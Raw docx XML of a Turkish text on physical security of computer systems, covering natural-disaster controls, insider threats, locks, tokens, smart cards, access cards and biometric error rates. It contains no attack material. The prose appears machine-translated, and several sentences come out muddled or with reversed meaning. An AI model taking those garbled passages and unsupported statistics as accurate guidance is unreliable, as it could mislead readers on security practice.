      <w:bookmarkEnd w:id="181"/>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fiziksel güvenlik uygulaması yapılmadan önce, bilgisayar sistemlerine yönelik mevcut tehditlere odaklanmak ve kaynakların en iyi harcanabileceği yeri belirlemek için sınırlı bir ticari etki analizi (BIA) yapmak yararlı olabilir. Tüm olası tehditleri, muhtemel olmayanları bile dikkate almak çok önemlidir. Phoenix'deki bir tsunami veya Maui'deki bir kum fırtınası gibi sıfır olma ihtimali olanları görmezden gelin. Çok basit bir BİA gösterildiği gibi çizilebilir. Sınırsız sayıda tehdit kuruluşunuz için endişe verici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sayıda yüksek olasılık tehdidi tespit edilebilir. Öncelikle, kuruluşunuzu gerçekten etkileyebilecek tehditleri (örneğin yangın, sel veya sahtekarlık) göz önünde bulundurun. Üç unsur genellikle her tehditle ilişkilendir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adde: yıkıcı madde bir insan, bir makine veya doğa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ebep: Yanlışlıkla ve kasten tehdit edebilecek tek ajan insan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onuçlar: Bilgi sistemleri topluluğu için bu erişim kaybı veya yetkisiz erişim, değişiklik veya verilerin veya bilgilerin ifşası veya imh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Not: Her bir efekti 4 = yüksek - 1 = düşük olarak sıralayın. Her bir kaynağı 4 = zayıf kaynak, 1 = mevcut güçlü kaynak temelinde sıra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ğin odağı genellikle sabotaj, hackleme ve insan hatası gibi insan kaynaklı felaketler olmuştur. Aynı tür tehditlerin doğal afetlerden de kaynaklanabileceğini unutmayın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="007C7991">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="182" w:name="_Toc7996870"/>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oğal</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Felaketler ve Kontroller</w:t>
      </w:r>
      <w:bookmarkEnd w:id="182"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21B6C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:ind w:left="1152"/>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angın - Bir çakışma, bilgi sistemlerini ısı, duman ya da bastırma ajanı (örneğin, yangın söndürücüler ve su) hasarlarından etkiler. Bu tehdit kategorisi küçük, büyük veya yıkıcı olabilir. Kontroller: ekipmanın yanına duman dedektörleri takın; Yangın söndürücüleri ekipmanın yakınında bulundurun ve çalışanları uygun kullanımları için eğitin; Düzenli yangın tahliye tatbikatları yap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evresel başarısızlık - Bu felaket türü, ülkeye sağlanan kontrollü çevre desteğinin temininde herhangi bir kesinti içerme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operasyon merkezi. Çevresel kontroller temiz hava, klima, nem ve su içerir. Kontroller: insanlar ve bilgisayarlar iyi bir arada bulunmadığından, onları ayrı tutmaya çalışın. Birçok şirket çalışanlar için komuta merkezleri ve makineler için “ışıklı” bir ortam kuruyor. Bilgisayar içeren tüm odaları makul sıcaklıklarda tutun (60 - 75 ° F veya 10 - 25 ° C). Nem seviyelerini% 20 ila 70 arasında tutun ve çevre ayarlarını izleyin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> [6].</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eprem - Şiddetli bir yer hareketi, yeryüzündeki stres ve hareketlerden kaynaklanır. Kontroller: bilgisayar sistemlerini cam ve yüksek yüzeylerden uzak tutun; yüksek riskli bölgelerde bilgisayarları antivibrasyon cihazlarıyla sabitleyin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21B6C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A21B6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Örnek 1. İş Etki Analizi Örne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ıvı Sızıntısı - Bir sıvı sızıntısı patlama veya sızıntı yapan boruları içer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ve fıskiyelerin yanlışlıkla boşaltılması. Kontroller: sıvı geçirmez kapakları ekipmanın yakınında tutun ve bilgisayar sistemlerinin yakınındaki yapısal zemine su dedektörleri tak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ıldırım - Bir elektrik yükü, tesise doğrudan yıldırım çarpması veya elektrik enerjisi iletim hatlarına, trafolara ve trafo merkezlerine yapılan grev nedeniyle dalgalanmalara neden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ontroller: aşırı gerilim koruyucuları kurun, yedekleri topraklanmış depolama ortamına koyun, Kesintisiz Güç Kaynağı (UPS) ve dizel jeneratörleri kurun ve tes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lektrik Kesilmesi - Elektrik beslemesinde kesint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enellikle bir buçuk saatten uzun süren, ciddi bir iş etkisi olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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ontroller: UPS'i kurun ve test edin, voltaj yükselmelerini kontrol etmek için hat filtreleri takın ve antistatik halılar takın.</w:t>
      </w:r>
      <w:bookmarkStart w:id="183" w:name="_Toc7996871"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008A3D22" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:t>İNSAN FAKTÖRÜ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="183"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21B6C"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on FBI istatistikleri, tüm hırsızlık, sahtekarlık, sabotaj ve kazaların% 72'sinin bir şirketin kendi çalışanlarından kaynaklandığını göstermektedir. % 15 ila 20 oranında başka bir bina, sistem ve bilgiye erişim sağlayan müteahhit ve danışmanlardan geliyor. Sadece% 5 ila 8'i dış insanlar tarafından yapılıyor, ancak basın ve yönetim çoğunlukla bunlara odaklanıyor. Tipik bilgisayar suçlusu, kontrol eksikliklerini tespit etmek için yeterince uzun süredir devam eden, teknik olmayan, yetkili bir kullanıc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ontrol cihazlarını uygularken kontrollerin yapıldığından emin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uruluşun gereksinimlerini karşılayın. Dahili erişimin bir incelemesini dahil edin ve çalışanların dış kaynaklara uygulanan özen standartlarını karşıladığından emin olun. “Davetsiz misafir” bir binaya, sisteme veya verilere girme yetkisi olmayan herhangi birini içer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İşgalcilere karşı ilk savunma onları binadan veya bilgisayar odasından uzak tutmak. Bununla birlikte, son yirmi yıldaki maliyet azaltıcı önlemler nedeniyle, artık çok az bilgisayar tesisi </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>korunmaktadır. Her yerde bilgisayarlarla, kilitlerin nereye takılacağını belirlemek önemli bir sorundu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iş ortamına erişmek için herkes bir kimlik doğrulama ve / veya yetkilendirme testinden geçmek zorundadır. Kullanıcıları doğrulamanın üç yolu bir şey içerir:</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ullanıcının bildiği bir şifre (şifr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ullanıcının sahip olduğu (bir rozet, anahtar, kart veya jeto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Fizyolojileri arasında (parmak izi, retina görüntüsü, ses).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="007C7991">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="184" w:name="_Toc7996872"/>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>KİLİTLER</w:t>
      </w:r>
      <w:bookmarkEnd w:id="184"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21B6C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>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mpüsü güvenceye almanın yanı sıra,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bilgisayarlar, ağlar, disk sürücüleri ve elektronik ortamlar. Bir iş istasyonunu sabitlemenin bir yöntemi, bir iş istasyonu yüzeyine tutturulmuş kilitleme çubuklarına sahip metal bir ped olan bir bağlantı pedidir. Mekanizma bilgisayarın kabuğuna kurulur. Bunlar birçok satıcıdan temin edil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çok kurum kablo ve kilit kullanır. Güvenlik kabloları, güvenlik kablosunu masaya veya başka bir düzeneğe sabitleyen, sabit bir şekilde tutturulmuş bir plaka ile iş istasyonuna yapıştırılmış uçak tipi çelik kablolar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isk kilitleri, iş istasyonunu güvence altına almanın başka bir yoludur. Bunlar küçük</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cihazlar hızlı bir şekilde disket yuvasına yerleştirilir ve ünitedeki diğer tüm disketleri kilitler. Yetkisiz önyüklemenin disketten ve virüslerden kaynaklanan enfeksiyonlardan korunmasını önleyebilir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riptografik kilitler ayrıca görüntüleyerek yetkisiz erişimi önler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yetkisiz personele okunamayan bilgiler. Şifreleme yazılımı, hassas işletme bilgilerinin gizliliğini sağlarken günlük işlemleri etkilemez. Kriyografik kilitler uygun maliyetlidir ve kolayca temin edilebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="007C7991">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="185" w:name="_Toc7996873"/>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>JETON</w:t>
      </w:r>
      <w:bookmarkEnd w:id="185"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21B6C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>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san güvenliği güçleri küçüldükçe, yalnızca yetkili personelin bilgisayar odasına girebilmesini sağlamak için daha fazla ihtiyaç vardır. Belirteç, kullanıcının kimliğini doğrulamak için taşıdığı nesnedir. Bu aygıtlar kartlı kartlar, kart okuyucular veya biyometrik aygıtlar olabilir. Aynı amaca sahipler: kullanıcıyı sisteme doğrulamak. En yaygın biçim, normalde taşımaya yetkili kişi hakkında kodlanmış bilgiler içeren elektrikli bir cihaz olan karttır. Belirteçler tipik olarak başka bir kimlik doğrulama türü ile kullanılır. Birçok şifre kilitleri token card access sistemleri ile değiştirildi.</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3"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="186" w:name="_Toc7996874"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Mücadele-Tepki Jetonları</w:t>
      </w:r>
      <w:bookmarkEnd w:id="186"/>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Mücadele yanıtı belirteçleri, kimlik doğrulama isteyen işlemlerden (Güvenlik Dinamikleri’nin SecurID’si gibi) bir sorun kullanılarak oluşturulan şifreleri sağlar. Kullanıcılar kendilerine tahsis edilmiş kullanıcı kimliklerini ve şifrelerini ve ayrıca belirteç kartı tarafından sağlanan şifreyi girerler. Bu işlem, kullanıcının sahip olduğu bir şeyi (belirteç) ve bildiği bir şeyi (mücadele / yanıt süreci) tedarik etmesini gerektirir. Bu işlem parola koklama ve kaba kuvvet saldırılarını boşuna harcar. Challenge-cevap asenkron bir süreçtir. Meydan okumaya bir alternatif, sistemden bir meydan okuma girilmeden şifreyi oluşturan senkronize belirteçtir. Kullanıcı ve belirteç kombinasyonu sisteme kaydedildiğinde kimlik doğrulaması yapan bilgisayarla senkronize edilir.</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3"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="187" w:name="_Toc7996875"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Salak Kartlar</w:t>
      </w:r>
      <w:bookmarkEnd w:id="187"/>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zun yıllardır çoğu insan için fotoğraflı kimlik kartı kimlik belgesi niteliğindedir. Sürücü ehliyetleri, pasaportları ve çalışan kimliği rozetleri ile, resim - kişinin istatistikleriyle birlikte - kimlik doğrulama işleminin tamamlanması için yeterli bilgi sağlar. Çoğu kişi rozeti güvenlik görevlisine vurur veya banka memuruna lisans verir. Birisi görsel olarak kimlik sahibinin yüzünü karttaki bilgilerle eşleştirir.</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3"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="188" w:name="_Toc7996876"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Akıllı kartlar</w:t>
      </w:r>
      <w:bookmarkEnd w:id="188"/>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tomatik vezne makinesi (ATM) kart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ptal kart”; bu “akıllı” kartlar, kullanıcının erişim sağlamak için kartla birlikte kişisel bir kimlik numarası (PIN) girmesini gerektirir. ATM, manyetik şeritte kodlanan bilgileri, ATM makinesine girilen bilgiler ile karşılaştır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kıllı kart, bir işlemci, programları ve verileri depolamak için kullanılan belleği ve bir tür kullanıcı arayüzünü içeren mikroçipler içerir. Hassas bilgiler, hafızasında, üretim sırasında kodlanan ve kart sahibinin erişemeyeceği gizli bir salt okunur alanda tutulu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enellikle, bu kartlar bilgileri koruyan bir tür şifreleme yöntemi kullanır. Tüm akıllı kartlar kart okuyucularla çalışmaz. Bir kullanıcı kartı okuyucuya yerleştirir, sistem bir mesaj görüntüler ve eğer bir eşleşme varsa, kullanıcıya erişim verilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="189" w:name="_Toc7996877"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Erişim Kartı Türleri</w:t>
      </w:r>
      <w:bookmarkEnd w:id="189"/>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rişim kartları, orijinalliği sağlamak için farklı teknolojiler kullan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Fotoğraflı kimlik kartları, kullanıcının yüzünün bir fotoğrafını içerir ve görsel olarak kontrol ed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ptik kodlu kartlar, ikili sıfırları ve bireyin kodlanmış kimlik numarasını içerenleri temsil eden küçük, fotoğrafla kazınmış veya lazer yanmış noktalar içerir. Kartın koruyucu laminasyonu, verileri yok etmeden ve kartı geçersiz kılmadan çıkarılama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Elektrik devre kartlarında basılı devre deseni bulunur. Bir okuyucuya yerleştirildiğinde, kart bazı elektrik devrelerini kapa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n yaygın kullanılan erişim kontrol kartı biçimi olan manyetik kartlar, kodlanmış halde kullanıcının kalıcı kimlik numarasını içeren manyetik parçacıklar içerir. Veriler kartta kodlanabilir, ancak bandın kendisi değiştirilemez veya kopyalanama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etalik şeritli kartlarda bakır şerit sıraları var. Striplerin varlığı veya yokluğu kodu belirler.</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1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="190" w:name="_Toc7996878"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Biyometrik Cihazlar</w:t>
      </w:r>
      <w:bookmarkEnd w:id="190"/>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 insan, incelenip ölçülebilen benzersiz fizyolojik, davranışsal ve morfolojik özelliklere sahiptir. Biyometri, bu özelliklerin olumlu kişisel kimlik tespiti için kullanılmasıdır. Parmak izleri ve imzalar, bir kişinin kimliğini kanıtlamak için yıllarca kullanılmıştır, ancak bireyler başka birçok şekilde tanımlanabilir. Bilgisayarlı biyometri tanımlama sistemleri belirli bir özelliği inceler ve bu bilgileri kullanıcının bir binaya girip giremeyeceğini, bilgisayarın kilidini açıp açamayacağını veya sistem bilgilerine erişip erişemeyeceğini belirlemek için kullan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yometrik cihazlar, bireye özgü bilgileri toplamak için video kamera, retinal tarayıcı veya mikrofon gibi bir tür veri giriş cihazı kullanır. Kimlik doğrulama işleminde bir kullanıcının biyometrik karakteristiğinin (parmak izi, ses vb.) Sayısallaştırılmış bir gösterimi kullanılır. Bu kimlik doğrulama türü neredeyse sahtekarlığa karşı korumalıdır ve asla yanlış yerleştirilmez. Veriler nispeten statiktir ancak mutlaka gizli değildir. Bu kimlik doğrulama işleminin avantajı, giriş cihazlarına doğru verileri sağlamasıdır.</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2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="191" w:name="_Toc7996879"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Parmak izi tarama</w:t>
      </w:r>
      <w:bookmarkEnd w:id="191"/>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ey, parmağını tarayan, parmak izini sayısallaştıran ve dosyada depolanan bir parmak izi görüntüsüyle karşılaştıran bir okuyucunun içine ya da parmağını yerleştirir. Bu yöntem, kişilerin kimliklerini doğrulamak veya bilgileri tanımak için birçok kişiyi kapsayan bir veri tabanıyla karşılaştırmak için kullanılabilir. Performan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reddetme oranı =% 9,4</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kabul oranı = 0</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talama işlem süresi = 7 saniye</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2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="192" w:name="_Toc7996880"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Retina Taraması</w:t>
      </w:r>
      <w:bookmarkEnd w:id="192"/>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cihaz, kullanıcının lazerin kan damarlarının desenini taradığı bir merceğe bakmasını gerektirir. Desenler pozitif tanımlama sağlamak için karşılaştırılır. Bu yaklaşık 2,650 do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erforman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Yanlış ret oranı =% 1.5</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kabul oranı =% 1.5</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talama işlem süresi = 7 saniye</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:t>Avuç İçi Taram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istem, insan avucunun 2 inç karelik bir alanından 10,000 nokta bilgi tarar. Bilgiyle, sistem kişiyi sahtekâr veya sahtekar olarak tanımlar. Tipik fiyat 2,500 dolar. Performansı:</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reddetme oranı = 0</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kabul oranı =% 0.00025</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talama işlem süresi = 2-3 saniye</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2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="193" w:name="_Toc7996881"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>El Geometrisi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="193"/>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cihaz tanımlama sağlamak için üç boyutlu el geometrisi ölçümlerini kullanır. Tipik fiyat 2.150 dolar. Performansı:</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ret oranı =% 0.1</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kabul oranı =% 0,1</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talama işlem süresi = 2 ila 3 saniye</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2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="194" w:name="_Toc7996882"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.5 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yüz tanıma</w:t>
      </w:r>
      <w:bookmarkEnd w:id="194"/>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oğrulama yerine monte edilmiş bir kamera kullanarak (kapı, monitör vb.), Cihaz giriş yapan kişinin görüntüsünü, sisteme endeksli yetkili kullanıcının kayıtlı görüntüsü ile karşılaştırır. Tipik fiyat 2,500 do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erforman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talama işlem süresi = 2 saniye</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.6 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:t>Ses Doğrula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 kişi belirli bir cümleyi bir mikrofona konuştuğunda, bu cihaz ses düzenini analiz eder ve depolanan bir veri tabanıyla karşılaştırır. Fiyat, 3.000 kullanıcı için 12.000 $ 'a kadar çıkabiliyor. Performan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reddetme oranı =% 8,2</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lış kabul oranı =% 0,4</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Ortalama işlem süresi = 2 - 3 saniye (cevap süresi şifre veya cümlenin gerçekten ses doğrulama sistemine konuşmasından sonra hesaplanır).</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1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="195" w:name="_Toc7996883"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TEST YAPMAK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="195"/>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üvenlik sistemleri, şifreler, kilitler, kartlar, biyometri ve diğer kimlik doğrulama cihazlarının kurulu olduklarından itibaren doğru şekilde çalışması beklenir, ancak bunların çalışmasını sağlayan yönetim ve testtir. Çalışanlar acil yangın çıkışlarını rutin olarak kullanıyorlarsa, bilgisayar odası için ayrıntılı bir erişim kontrol sistemi kurulmasında çok az nokta vardır. Çalışanlar, fiziksel güvenlik sistemlerinin doğru kullanımı konusunda eğitilmelidir. Erişim günlükleri zamanında izlenmeli ve uzlaştırıl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ğitim ve farkındalık zaman, para ve personel gerektirir, ancak kuruluşların artan rekabet ve azalan kaynaklar nedeniyle ortaya çıkan zorlukların üstesinden gelmesi esastır. Teknoloji ve çalışanlar arasında bir ortaklık olmalı. Teknolojiyi tedarik etme ve kurma gibi çalışanların eğitimi için en az zaman harcamak ve kaynak harcamak. Çalışanlar, kontrol mekanizmalarının neden seçildiğini ve güvenlik sürecinde rollerinin ne olduğunu anlamalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:bookmarkStart w:id="196" w:name="_Toc7996884"/>
      <w:r>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:t>ÖZET</w:t>
      </w:r>
